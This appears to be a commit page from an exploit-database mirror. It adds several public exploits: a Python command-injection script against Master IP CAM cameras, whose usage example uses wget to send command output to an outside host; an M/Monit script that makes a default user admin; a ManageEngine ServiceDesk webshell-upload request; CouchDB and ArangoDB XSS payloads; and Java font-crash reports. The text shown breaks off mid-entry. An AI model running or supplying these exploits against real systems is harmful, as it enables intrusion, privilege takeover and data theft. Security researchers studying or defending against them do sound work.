bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-02-19

Browse source 
25 changes to exploits/shellcodes

Realterm Serial Terminal 2.0.0.70 - Denial of Service
Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)
NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass
Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process

mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers
qdPM 9.1 - 'type' Cross-Site Scripting
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting
Master IP CAM 01 3.3.4.2103 - Remote Command Execution
MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
CMSsite 1.0 - 'post' SQL Injection
M/Monit 3.7.2 - Privilege Escalation
Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload
Apache CouchDB 2.3.0 - Cross-Site Scripting
ArangoDB Community Edition 3.4.2-1 - Cross-Site Scripting
Comodo Dome Firewall 2.7.0 - Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload
WordPress Plugin WooCommerce - GloBee (cryptocurrency) Payment Gateway 1.1.1 - Payment Bypass / Unauthorized Order Status Spoofing

macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)
macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)
macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)
This commit is contained in:
Offensive Security 2019-02-19 05:02:08 +00:00
parent 997deeda21
commit cd868436ff
27 changed files with 2631 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

52
exploits/cgi/webapps/46400.py Executable file
View file

@ -0,0 +1,52 @@
# Exploit Title: Master IP CAM 01 Remote Command Execution
# Date: 09-02-2019
# Remote: Yes
# Exploit Authors: Raffaele Sabato
# Contact: https://twitter.com/syrion89
# Vendor: Master IP CAM
# Version: 3.3.4.2103
# CVE: CVE-2019-8387
import sys
import requests
if len(sys.argv) < 3:
print "[-] Usage: python MasterIpCamRCE.py <ip> <cmd>"
print "[-] Example: python MasterIpCamRCE.py 192.168.1.54 'wget http://192.168.1.55:4444/$(id)'"
exit(1)
host = sys.argv[1]
command = sys.argv[2]
page = [
"bconf.cgi",
"ddns_start.cgi",
"getddnsattr.cgi",
"getinetattr.cgi",
"getnettype.cgi",
"getupnp.cgi",
"getwifiattr.cgi",
"getwifistatus.cgi",
"inetconfig.cgi",
"iptest.cgi",
"listwifiap.cgi",
"p2p.cgi",
"paraconf.cgi",
"scanwifi.cgi",
"setadslattr.cgi",
"setddnsattr.cgi",
"setinetattr.cgi",
"setwifiattr.cgi",
"upnp_start.cgi",
"wifimode.cgi",
"wifitest.cgi",
]
for x in page:
url = "http://"+host+"/cgi-bin/"+x+"?cmd=`"+command+"`"
#url = "http://"+host+"/cgi-bin/"+x+"?action=`"+command+"`"
print "[*] Attack on "+x
print "[+] Sending the payload"
r = requests.get(url)
if r.status_code == 200:
print "[+] Exploit Success"
break

94
exploits/java/dos/46409.txt Normal file
View file

@ -0,0 +1,94 @@
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of OpenType fonts. It manifests itself in the form of the following crash (with AFL's libdislocator):
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x6d1a
RBX: 0x7fffb5d94f48 --> 0x7fffb6319f00 --> 0x53ab1500ff
RCX: 0xffffffffffff0000
RDX: 0x7fff28fbdfe6 --> 0x2a001d00100003
RSI: 0x7fff28fadfe8 --> 0x1e001100040000
[...]
[-------------------------------------code-------------------------------------]
0x7fffb6395564 <glyph_CloseContour+148>: mov rsi,QWORD PTR [rbx+0x20]
0x7fffb6395568 <glyph_CloseContour+152>: add rcx,rcx
0x7fffb639556b <glyph_CloseContour+155>: lea rdi,[rdx+rcx*1-0x2]
=> 0x7fffb6395570 <glyph_CloseContour+160>: movsx rsi,WORD PTR [rsi+rcx*1-0x2]
0x7fffb6395576 <glyph_CloseContour+166>: mov rdx,QWORD PTR [rbx+0x30]
0x7fffb639557a <glyph_CloseContour+170>: movsx rcx,WORD PTR [rdi]
0x7fffb639557e <glyph_CloseContour+174>: movzx r8d,WORD PTR [rdx+rcx*2]
0x7fffb6395583 <glyph_CloseContour+179>: cmp WORD PTR [rdx+rsi*2],r8w
[...]
Stopped reason: SIGSEGV
0x00007fffb6395570 in glyph_CloseContour () from jre/8u202/lib/amd64/libt2k.so
gdb-peda$ where
#0 0x00007fffb6395570 in glyph_CloseContour () from jre/8u202/lib/amd64/libt2k.so
#1 0x00007fffb63ad71c in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#2 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#3 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#4 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#5 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#6 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#7 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#8 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#9 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#10 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#11 0x00007fffb63afa01 in Type2BuildChar () from jre/8u202/lib/amd64/libt2k.so
#12 0x00007fffb63b469c in tsi_T2GetGlyphByIndex () from jre/8u202/lib/amd64/libt2k.so
#13 0x00007fffb63b5655 in tsi_NewCFFClass () from jre/8u202/lib/amd64/libt2k.so
#14 0x00007fffb63c73c8 in New_sfntClassLogical () from jre/8u202/lib/amd64/libt2k.so
#15 0x00007fffb63a43e3 in Java_sun_font_T2KFontScaler_initNativeScaler () from jre/8u202/lib/amd64/libt2k.so
#16 0x00007fffe5e376c7 in ?? ()
#17 0x00007fff0003ccc0 in ?? ()
#18 0x0000000000000000 in ?? ()
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash can be observed with PageHeap enabled for the java.exe process:
--- cut ---
(5f34.5d1c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
t2k+0xfbec:
00007ffa`0b4cfbec 4e0fbf4c50fe movsx r9,word ptr [rax+r10*2-2] ds:00000000`39c44ffe=????
0:004> k
# Child-SP RetAddr Call Site
00 00000000`0d82de70 00007ffa`0b4e0c0d t2k+0xfbec
01 00000000`0d82dea0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x5305
02 00000000`0d82df20 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
03 00000000`0d82dfa0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
04 00000000`0d82e020 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
05 00000000`0d82e0a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
06 00000000`0d82e120 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
07 00000000`0d82e1a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
08 00000000`0d82e220 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
09 00000000`0d82e2a0 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0a 00000000`0d82e320 00007ffa`0b4e2979 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0b 00000000`0d82e3a0 00007ffa`0b4e3dd1 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x7071
0c 00000000`0d82e420 00007ffa`0b4e4108 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x84c9
0d 00000000`0d82e460 00007ffa`0b4e47e4 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x8800
0e 00000000`0d82e4b0 00007ffa`0b4f07c5 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0x8edc
0f 00000000`0d82e500 00007ffa`0b4f0b11 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x72c9
10 00000000`0d82e560 00007ffa`0b4d9ef6 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x7615
11 00000000`0d82e5e0 00000000`0f928d27 t2k!Java_sun_font_T2KFontScaler_initNativeScaler+0x2c2
12 00000000`0d82e650 00000000`2ad8f228 0xf928d27
13 00000000`0d82e658 00000000`b0063339 0x2ad8f228
14 00000000`0d82e660 00000000`0d82e730 0xb0063339
15 00000000`0d82e668 00000000`b006f271 0xd82e730
16 00000000`0d82e670 00000000`00000000 0xb006f271
0:004> ? rax
Evaluate expression: 969232384 = 00000000`39c55000
0:004> ? r10
Evaluate expression: -32768 = ffffffff`ffff8000
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading OpenType fonts specified through a command-line parameter.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46409.zip

96
exploits/java/dos/46410.txt Normal file
View file

@ -0,0 +1,96 @@
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
Iteration (0,1)
Iteration (0,2)
Iteration (0,3)
Iteration (0,4)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007fbaa11694c8, pid=19540, tid=0x00007fbac4f18700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libfontmanager.so+0x284c8] OpenTypeLayoutEngine::adjustGlyphPositions(unsigned short const*, int, int, char, LEGlyphStorage&, LEErrorCode&)+0x268
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid19540.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the OpenTypeLayoutEngine::adjustGlyphPositions function attempts to access an invalid memory region:
--- cut ---
gdb-peda$ c
Continuing.
Iteration (0,0)
Iteration (0,1)
Iteration (0,2)
Iteration (0,3)
Iteration (0,4)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff0283cc0 --> 0x0
[...]
[-------------------------------------code-------------------------------------]
0x7fffc41cb4bb <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+603>: nop DWORD PTR [rax+rax*1+0x0]
0x7fffc41cb4c0 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+608>: lea rax,[rax+rax*4]
0x7fffc41cb4c4 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+612>: lea rax,[rdx+rax*4]
=> 0x7fffc41cb4c8 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+616>: addss xmm0,DWORD PTR [rax]
0x7fffc41cb4cc <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+620>: addss xmm1,DWORD PTR [rax+0x4]
0x7fffc41cb4d1 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+625>: movsxd rax,DWORD PTR [rax+0x10]
0x7fffc41cb4d5 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+629>: test eax,eax
0x7fffc41cb4d7 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+631>:
jns 0x7fffc41cb4c0 <_ZN20OpenTypeLayoutEngine20adjustGlyphPositionsEPKtiicR14LEGlyphStorageR11LEErrorCode+608>
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffc41cb4c8 in OpenTypeLayoutEngine::adjustGlyphPositions(unsigned short const*, int, int, char, LEGlyphStorage&, LEErrorCode&) ()
from jre/8u202/lib/amd64/libfontmanager.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(3798.db8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x13346:
00007ffa`0c9eb046 8b448a10 mov eax,dword ptr [rdx+rcx*4+10h] ds:00000000`69815274=????????
0:004> ? rdx
Evaluate expression: 1696397556 = 00000000`651cf8f4
0:004> ? rcx
Evaluate expression: 18421340 = 00000000`0119165c
0:004> k
# Child-SP RetAddr Call Site
00 00000000`055ce250 00007ffa`0c9e3c3f fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x13346
01 00000000`055ce3c0 00007ffa`0c9ef6fe fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0xbf3f
02 00000000`055ce420 00000000`056e8d27 fontmanager!Java_sun_font_SunLayoutEngine_nativeLayout+0x21e
03 00000000`055ce750 00000000`055ce750 0x56e8d27
04 00000000`055ce758 00000000`5cb9a4a8 0x55ce750
05 00000000`055ce760 00000000`055ce7c0 0x5cb9a4a8
06 00000000`055ce768 00000000`5cb3fd68 0x55ce7c0
07 00000000`055ce770 00000000`055ce8e8 0x5cb3fd68
08 00000000`055ce778 00000000`00000000 0x55ce8e8
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46410.zip

91
exploits/java/dos/46411.txt Normal file
View file

@ -0,0 +1,91 @@
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
Iteration (0,0)
Iteration (0,1)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f857116fde3, pid=31542, tid=0x00007f85a5a70700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libt2k.so+0x4cde3] ExtractBitMap_blocClass+0xcc3
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid31542.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the ExtractBitMap_blocClass function attempts to access an invalid memory region:
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Iteration (0,1)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x96e40 ('@n\t')
RBX: 0x100c4
RCX: 0x12dc8
RDX: 0x757969c4
RSI: 0x7ffff02f7238 --> 0x7840201008
[...]
[-------------------------------------code-------------------------------------]
0x7fffbf616ddb <ExtractBitMap_blocClass+3259>: mov ecx,eax
0x7fffbf616ddd <ExtractBitMap_blocClass+3261>: sar ecx,0x3
0x7fffbf616de0 <ExtractBitMap_blocClass+3264>: movsxd rcx,ecx
=> 0x7fffbf616de3 <ExtractBitMap_blocClass+3267>: movzx edi,BYTE PTR [rsi+rcx*1]
0x7fffbf616de7 <ExtractBitMap_blocClass+3271>: cmp edx,r8d
0x7fffbf616dea <ExtractBitMap_blocClass+3274>: jl 0x7fffbf616dd0 <ExtractBitMap_blocClass+3248>
0x7fffbf616dec <ExtractBitMap_blocClass+3276>: mov ecx,r11d
0x7fffbf616def <ExtractBitMap_blocClass+3279>: mov r13d,0x80
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffbf616de3 in ExtractBitMap_blocClass () from jre/8u202/lib/amd64/libt2k.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(5218.154c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2155:
00007ffa`0b8eb651 468a1c20 mov r11b,byte ptr [rax+r12] ds:00000000`64c09000=??
0:004> ? rax
Evaluate expression: 84720 = 00000000`00014af0
0:004> ? r12
Evaluate expression: 1690256656 = 00000000`64bf4510
0:004> k
# Child-SP RetAddr Call Site
00 00000000`04a8e9d0 00007ffa`0b8ebf92 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2155
01 00000000`04a8eaa0 00007ffa`0b8e8e05 t2k!Java_sun_font_T2KFontScaler_getGlyphVectorOutlineNative+0x2a96
02 00000000`04a8eb80 00007ffa`0b8e9011 t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0xd4fd
03 00000000`04a8ebf0 00007ffa`0b8daeab t2k!Java_sun_font_T2KFontScaler_getGlyphCodeNative+0xd709
04 00000000`04a8ec90 00000000`04f18d27 t2k!Java_sun_font_T2KFontScaler_getGlyphImageNative+0x163
05 00000000`04a8ed60 00000000`02a3e1f8 0x4f18d27
06 00000000`04a8ed68 00000000`04a8ee48 0x2a3e1f8
07 00000000`04a8ed70 00000000`5c36dff8 0x4a8ee48
08 00000000`04a8ed78 00000000`00000000 0x5c36dff8
--- cut ---
Attached with this report are three mutated testcases, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46411.zip

88
exploits/java/dos/46412.txt Normal file
View file

@ -0,0 +1,88 @@
A heap-based out-of-bounds read was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f42e9a30f79, pid=43119, tid=0x00007f431d7fc700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libfontmanager.so+0x7f79] AlternateSubstitutionSubtable::process(LEReferenceTo<AlternateSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const+0xe9
#
# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try "ulimit -c unlimited" before starting Java again
#
# An error report file with more information is saved as:
# jre/8u202/hs_err_pid43119.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
Aborted
--- cut ---
Under gdb, we can find out that the AlternateSubstitutionSubtable::process function attempts to access an invalid memory region:
--- cut ---
gdb$ c
Continuing.
Iteration (0,0)
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x7ffff7fbbc34 --> 0x0
RCX: 0xfff6
RDX: 0x8066
[...]
R12: 0x7ffff0237946 --> 0x100f6ff26000100
[...]
[-------------------------------------code-------------------------------------]
0x7fffcc1aaf72 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+226>:
movzx ecx,cx
0x7fffcc1aaf75 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+229>:
cmp ecx,edx
0x7fffcc1aaf77 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+231>:
jle 0x7fffcc1aaf3e <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+174>
=> 0x7fffcc1aaf79 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+233>:
movzx eax,WORD PTR [r12+rdx*2+0x6]
0x7fffcc1aaf7f <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+239>:
xor edx,edx
0x7fffcc1aaf81 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+241>:
rol ax,0x8
0x7fffcc1aaf85 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+245>:
movzx eax,ax
0x7fffcc1aaf88 <_ZNK29AlternateSubstitutionSubtable7processERK13LEReferenceToIS_EP13GlyphIteratorR11LEErrorCodePK13LEGlyphFilter+248>:
add r12,rax
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fffcc1aaf79 in AlternateSubstitutionSubtable::process(LEReferenceTo<AlternateSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const () from jre/8u202/lib/amd64/libfontmanager.so
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Windows, the crash manifests in the following way:
--- cut ---
(5ae8.5c58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager+0x11a9:
00007ffa`0d6211a9 0fb74c4306 movzx ecx,word ptr [rbx+rax*2+6] ds:00000000`4484a028=????
0:004> ? rbx
Evaluate expression: 1149476694 = 00000000`44839f56
0:004> ? rax
Evaluate expression: 32870 = 00000000`00008066
--- cut ---
Attached with this report is the mutated testcase, and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46412.zip

44
exploits/jsp/webapps/46413.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 - arbitrary file upload
# Date: 18-02-2019
# Exploit Author: Dao Duy Hung (duyhungattt@gmail.com)
# Vendor Homepage: https://www.manageengine.com/products/service-desk/
# Software Link: https://www.manageengine.com/products/service-desk/download.html?opDownload_indexbnr
# Version: 9.4 and 10.0 before 10.0 build 10012
# Tested on: SDP 10.0 build 10000
# CVE : CVE-2019-8394
Detail:
In file common/FileAttachment.jsp line 332 only check file upload extension when parameter 'module' equal to 'SSP' or 'DashBoard' or 'HomePage', and if parameter 'module' is set to 'CustomLogin' will skip check file upload extension function and upload arbitrary file to folder '/custom/login' and this file can access directly from url 'host:port/custom/login/filename' . An authenticated user with minimum permission (ex: guest) can upload webshell to server.
POST /common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1 HTTP/1.1
Host: localhost:8080
Content-Length: 508
Accept: */*
Origin: http://localhost:8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----aaa
Referer: http://localhost:8080/DashBoard.do
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; JSESSIONID=66716A38326AE43058F4A71FCF4E1E42; JSESSIONIDSSO=6970EB5659C20DFF0CF5015D9C91448E; sdpcsrfcookie=ec189770-d1aa-4db3-9a97-36f4ab3db380
Connection: close
------aaa
Content-Disposition: form-data; name="sspsetup"
Attach
------aaa
Content-Disposition: form-data; name="module"
CustomLogin
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.jsp"
Content-Type: text/html
This is shell content
------aaa
Content-Disposition: form-data; name="hmtlcontent"
------aaa--

54
exploits/multiple/webapps/46404.py Executable file
View file

@ -0,0 +1,54 @@
#!/usr/env/python3
"""
Vulnerability title: M/Monit <= 3.7.2 - Privilege Escalation
Author: Dolev Farhi
Vulnerable version: 2.0.151021
Link: https://mmonit.com
Date: 2/17/2019
"""
import sys
import requests
MMONIT_URL = 'http://ip.add.re.ss:8080'
MMONIT_USER = 'monit' # Default built in unprivileged user
MMONIT_PASS = 'monit'
s = requests.Session()
s.get(MMONIT_URL + '/')
resp = s.post(MMONIT_URL + '/z_security_check', params={'z_username':MMONIT_USER,'z_password':MMONIT_PASS})
if 'Invalid username and/or password' in resp.text:
print('Error logging in')
sys.exit(1)
zessionid = s.cookies.get_dict()['zsessionid']
headers = {
'CSRFToken':zessionid,
}
resp = s.post(MMONIT_URL + '/admin/users/update',
headers=headers,
params={'CSRFTOKEN':zessionid,
'fullname':'john doe',
'password':MMONIT_USER,
'title':'',
'email':'',
'phone':'',
'mobile':'',
'imname':'',
'uname':MMONIT_PASS,
'imtype':None,
'admin':'on',
'oldpassword':'D9CFD4AF77E33817DE2160E0C1C7607C'
})
if resp.status_code == 200:
print('Success! You are now M/Monit admin')
else:
print('Something went wrong')

64
exploits/multiple/webapps/46406.txt Normal file
View file

@ -0,0 +1,64 @@
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.0
##################################################################################################################################
Introduction
A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based - Create Database
URL
http://127.0.0.1:5984/_utils/#/_all_dbs
PAYLOAD
<img src=x onerror=alert(1)>
<input id="js-new-database-name" type="text" class="input-xxlarge"
placeholder="Name of database" value="<img src=x onerror=alert(1)>">
#################################################################################
XSS2 | DOM Based & Stored - Add Option
URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
METHOD
Put
PAYLOAD
<img src=x onerror=alert(2)>
<input class="input-option-name" type="text" name="name" placeholder="Name">
#################################################################################
XSS3 | DOM Based & Stored - Delete Option
URL
http://127.0.0.1:5984/_utils/#_config/couchdb@localhost
http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E
METHOD
Delete
PAYLOAD
<img src=x onerror=alert(2)>
#################################################################################

124
exploits/multiple/webapps/46407.txt Normal file
View file

@ -0,0 +1,124 @@
##################################################################################################################################
# Exploit Title: ArangoDB Community Edition 3.4.2-1 | Cross-Site Scripting
# Date: 17.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.arangodb.com
# Software Link: https://www.arangodb.com/download-major/
# Version: 3.4.2-1
##################################################################################################################################
Introduction
ArangoDB is a native multi-model, open-source database with flexible data
models for documents, graphs, and key-values. Build high performance
applications using a convenient SQL-like query language or JavaScript
extensions. Use ACID transactions if you require them. Scale horizontally
and vertically with a few mouse clicks.
#################################################################################
XSS details: DOM Based & Reflected & Stored
#################################################################################
XSS1 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#views
PAYLOAD
